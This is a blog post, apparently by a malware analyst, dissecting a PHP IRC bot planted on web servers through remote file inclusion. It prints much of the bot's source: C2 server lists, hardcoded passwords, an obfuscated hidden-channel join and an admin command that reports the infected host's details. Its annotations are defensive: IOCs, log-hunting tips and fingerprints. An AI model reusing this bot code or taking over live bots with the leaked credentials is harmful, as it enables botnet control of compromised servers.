Today, another RFI (remote file inclusion) infection. The sample to dissect is BDS/PHP.Agent.DW.8, a PHP script that, once pulled in by a vulnerable include, runs as an IRC bot on the compromised web server.
/***********************************
/* Guard Cakep Powered By dendy *
/* Female Character *
/* Copyleft Pebruari 2009 *
/* #pangkul @ irc.allnetwork.org *
/* vj_dendy@yahoo.co.id *
/***********************************
/*
/* Perhatian:
/* Joinkan hanya satu Bot dalam satu channel untuk menghindari terjadinya saling sapa antar bot.
/*
/* Perintah Dasar:
/* auth
/* !join [#channel] - Join channel
/* !part [#channel] - Part channel
/* !msg
/* !botnick [nick] [password] - Mengganti nick bot
/* !jump [server] - Mengganti server bot
/* !help - Melihat daftar perintah
/* !ngomong - Memperbolehkan bot untuk berbicara di semua channel
/* !diam - Melarang bot untuk berbicara di semua channel
*/
The bot supports the classic IRC control commands plus `!jump`, `!ngomong` and `!diam`, which we will look at below.
function hajar() {
$channels = '#pangkul'; //Pisahkan tiap channel dengan spasi
$admin = 'VJ_dEnDy';
$bot_password = 'jembod'; //Password untuk auth bot
$ngomong = TRUE; //TRUE, Ngomong. FLASE, Diem.
$autowelcome = TRUE; //TRUE, AutoWelcome On. FLASE, AutoWelcome off.
$versi = "v1.7";
$showresponse = 0; //1, Nampilin respon dari server irc
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
This configuration block alone gives an investigator most of what is needed: the C2 channel (`#pangkul`), the admin nick, and the bot's auth password, all hardcoded in cleartext. Anyone who obtains the script (it is fetched over HTTP, so it is typically recoverable from the web server's access logs or proxy cache) can presumably authenticate to the bot with `jembod` and take it over.
//Nick Bot
$nicklist = array("VJ1","VJ2","VJ3","VJ4","VJ5",
"VJ6","VJ7","VJ8","VJ9","VJ10","VJ11");
$identify = "230283"; //Password Nick Bot
//Ident Bot
$identlist = array("dendy",);
//Realname Bot
$namabot = array("d3ndy",);
//Asl Bot
$aslbot = array("dari chanel pangkul",);
//Pesan Quit
$quitmsglist = array("mau ngintip anak tetangga mandi :D","Bye All..");
Further identity details the bot uses when registering with the network, including the NickServ password (`230283`), which is sent in cleartext via `PRIVMSG nickserv :identify` once the server's 004 reply arrives.
$namaku = $namabot[rand(0,count($namabot) - 1)];
$aslku = $aslbot[rand(0,count($aslbot) - 1)];
The bot's realname and "asl" strings are drawn from these arrays with `rand()`, so individual instances look slightly different while sharing the same small fixed pool — handy for matching sibling bots on a network.
And here an interesting item: the array of IRC servers from which the bot picks its C2 at random. These hostnames, the bare IP `202.146.180.46` and port 6667 are the network IOCs to block at egress and to hunt for in firewall/netflow logs.
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"irc.cbn.net.id",
"irc.allnetwork.org",
"irc.elnus.net.id",
"irc.velo.net.id",
"irc.indika.net.id",
"irc.indo.net.id",
"irc.circleone.net.id",
"irc.ads.net.id",
"irc.jmn.net.id",
"202.146.180.46",
"irc.big.net.id",
"irc.sbp.net.id",
);
}
$port = "6667";
Next come the welcome-message and mood lists, which I skip since they are irrelevant here. More amusing is the list of "bad words" that the auto-response code presumably keys on:
//Special Words
$badwordlist = array("jancuk","babi","puki","s0so","s0s0","sos0","s0h","sosoh","k3h","peller","peler","p4lak","p4l4k","pal4k","#","join di","tae","p3p3k","p3pek","pep3k","m3k","ngengek","p0k","embot","asyu","setan","ancrit","coex","coek","jancox","mencret","cox","jancok","palak","memek","patek","pepek","kontol","anjrit","anjink",
"fuck","entot","ngentot","taek","kelamin","ngesex","ml ","pokeh","anjing",
"poke","tempek","vagina","penis","luji","kodo",);
$pujianlist = array("cantik","baik","baek","cakep","ramah","pengertian","hebat",
"bagus","indah","jujur");
$cacianlist = array("bego","jelek","jelex","gendeng","edan","gilo","gila",
"sinting","dudul","dodol","jahat","goblok","geblek","sialan"," bau","stres");
//Flood Protection Setting
$maxkar = 200; //Maksimal karakter di channel
No more than 200 characters per channel message (`$maxkar`); this is the bot's own flood threshold (the enforcing code is not shown here), not any kind of protection for the infected host.
$helptext = array(
' 3,9? 0,1 ? ¬den¬ dy #pangkul '.$versi.' Help ? 3,9? ',
"-",
" 12auth
" 12deauth - Logout dari bot",
" 12pass
" 12chgpass
" 12adduser
" 12deluser
" 12`auth - Status anda di channel (Channel)",
" 12!auth - Status otorisasi anda",
" 12!act
" 12!slap
" 12!msg
" 12!notice
" 12!ctcp
" 12!ping - Meminta bot untuk membalas dg pong (Channel)",
" 12!info - Melihat info bot (Admin)",
" 12!up - Meminta bot untuk menjadi @ di channel (Channel)",
" 12!down - Meminta bot untuk turun dari @ di channel (Channel)",
" 12!cycle
" 12!part [channel] [alasan] - Part dari channel (Admin)",
" 12!join
" 12!botnick
" 12!k
" 12!kb
" 12!changenick - Ganti nick ke nick internal",
" 12!op
" 12!deop
" 12!v
" 12!dv
" 12!away [alasan] - Meminta nick untuk Away",
" 12!mode
" 12!nickmode
" 12!userlist - Melihat daftar user",
" 12!quit [pesan] - Quit dari IRC (Admin)",
" 12!vhost [vhost] - Mengganti Vhost",
" 12!jump [server] - Mengganti Server bot",
" 12!fullname [nama] - Mengganti Fullname bot",
" 12!topic
" 12!help - Melihat help (Query)",
" 12!ngomong - Mengaktifkan Auto Response",
" 12!diam - Menonaktifkan Auto Response",
" 12!wb
"-",
' 3,9? 0,1 ? By VJ_dEnDy - #pangkul @ irc.allnetwork.org ? 3,9? ',
);
This is the help text, and reading it is the quickest way to enumerate the supported commands. It shows a full channel-management bot — join/part, kicks, mode changes, nick and server switching, quitting — driven entirely over IRC by whoever authenticates with the embedded password.
$nick = $nicklist[rand(0,count($nicklist) - 1)];
$realname = $namaku;
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
$admin = strtolower($admin);
$auth = array(
$admin => array(
"name" => $admin,
"pass" => $bot_password,
"auth" => 1,
"status" => "Admin"
)
);
This picks a random nick from `$nicklist` and a random C2 server from `$remotehost2`, then builds the `$auth` table with a single entry for the (lowercased) admin nick: name, password, auth flag and status set to `Admin`.
$username = $identlist[rand(0,count($identlist) - 1)];
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
A random ident is picked from `$identlist`; the channel list is lowercased and split on spaces.
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 60);
//Jika koneksi gagal
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp + 1;
hajar();
}
else {
echo ">Ga bisa connect ke $remotehost!";
$keluar = 1;
exit;
}
}
Connect to the remote host. Two things are worth noting here: `fsockopen(..., &$err_num, &$err_msg, 60)` uses call-time pass-by-reference, which PHP removed in 5.4, so the sample targets older PHP builds; and the retry path calls `hajar()` recursively instead of looping, with `$counterfp` a local that is never initialised (unless it is declared `global` somewhere not shown), so every recursive call starts from null and the 200-attempt cap never actually triggers.
$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = "
";
Sends the NICK/USER registration to the socket. `$localhost` is not assigned anywhere in the lines shown before this point, so on the first pass the hostname field of the USER line is presumably empty; it is only set later by the `!vhost` command.
while (!feof($fp)) {
$response .= fgets($fp, 1024);
if ($showresponse == 1) { echo $response."
"; }
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$offsetB = strpos($data, ' :');
$offsetC = strpos($data, '!');
$dFrom = substr($data,1,$offsetA-1);
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
This splits the raw IRC line into sender, command and text; the following piece handles server numerics. On `004` (registration complete) the bot identifies to NickServ and then sends a base64-obfuscated line — `Sk9JTiAjRmVlTENvTXo=` decodes to `JOIN #FeeLCoMz` — before joining the configured channels. That hidden channel is not in `$channels`, so it is most likely one the original script author keeps for themselves; add it to the IOC list alongside `#pangkul`.
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, base64_decode('Sk9JTiAjRmVlTENvTXo=') . CRL);
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :Hai Boss!' . CRL);
/*** Join Default Channel ***/
foreach ($channel as $v) { fputs($fp, 'JOIN ' .$v . CRL); }
}
elseif (substr($dCommand,0,3)=='432'){
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
//Nickname is already in use
elseif (substr($dCommand,0,3)=='433'){
$nick = $nicklist[rand(0,count($nicklist) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='465'){
echo "
Authentication diperlukan! Bot ini telah di-autokill.";
$akill = 2;
}
if (substr_count($dNick,'.allnetwork.org') > 0) {
if (substr_count($iText,"*** Banned") > 0) {
echo "BANNED!";
$keluar = 1;
exit;
}
}
/*** AI PHP BOT SCRIPT VJ_dEnDy ***/
$dcom = explode(" ", $dCommand);
if ($dcom[0]=='JOIN') {
/*** Auto Welcome by VJ_dEnDy ***/
$ada = FALSE;
if ($autowelcome) {
$jchan = ltrim($iText,":");
foreach ($nickwb as $v){
$trtext = strtolower($v[0]);
if (substr_count(strtolower($dNick),$trtext) > 0) {
sleep(3);
fputs($fp,'PRIVMSG '.$jchan.' :'.$v[1]. CRL);
$ada = TRUE;
}
}
}
if (($autowelcome) && ($dNick != $nick)) {
if(!$ada) {
$jchan = ltrim($iText,":");
$webe = $wbmsg[rand(0,count($wbmsg) - 1)];
$webe = str_replace("
$webe = str_replace("
$webe = str_replace("#","",$webe);
sleep(5);
fputs($fp,'PRIVMSG '.$jchan.' :'.$webe . CRL);
}
}
}
if ($dcom[0]=='PRIVMSG') {
/*** Auto Response by VJ_dEnDy ***/
if ($ngomong) {
$teman = FALSE;
if (in_array($dNick,$nicklist)) {
$teman = TRUE;
}
Auto-response is enabled for PRIVMSG lines (channel and private messages both arrive as PRIVMSG); the `$teman` flag marks the sender as a sibling bot when its nick is in `$nicklist`. The bot also handles the following events:
- Good reply
- Bad reply -> kick
- Flood protection
Some interesting commands follow.
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).base64_decode("VkVSU0lPTiBGZWVMQ29NeiBBSSBQSFBCb3QgU2NyaXB0IEJ5IF
J
vTno=").chr(1) . CRL);
Decoded: `VERSION FeeLCoMz AI PHPBot Script By RoNz`. The CTCP VERSION reply is a fixed string, so it is a cheap fingerprint for spotting this family on an IRC network.
elseif ($com[3]==':!info') {
if ($auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bip = $_SERVER['SERVER_ADDR'];
$bphp = $_SERVER['PHP_SELF'];
$bruri = $_SERVER['REQUEST_URI'];
$brip = $_SERVER['REMOTE_ADDR'];
$brport = $_SERVER['REMOTE_PORT'];
fputs($fp,"NOTICE $dNick :Host: $bhost | Script: $bphp | Referer: $bruri | IP: $bip | Your IP: $brip Port:$brport" . CRL);
This is the reply when an admin sends `!info`: it leaks the infected host's name, server IP, script path and request URI, plus the IP and port of the HTTP client that triggered the script — which is how the operator learns where each bot is hosted. For an investigator, `PHP_SELF`/`REQUEST_URI` point at the vulnerable include, and in the RFI case the "Your IP" value is the client that injected the bot, so the web server's access-log entry for that request URI is the next thing to pull. Next come two further admin-only commands: `!vhost`, which sets `$localhost` and sends QUIT (presumably so the outer loop reconnects with the new identity), and `!jump`, which with no argument picks a random server from `$remotehost2`.
elseif ($com[3]==':!vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':!jump' && $auth["$dNick"]["status"]=="Admin") {
if (empty($com[4])) {
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
}
This bot family is currently found on a large number of compromised web servers. See you in the next post. :)
Nice blog! Really liked this post.
Too bad the blog is in italian (I think, maybe spanish?).
will follow it soon. well done.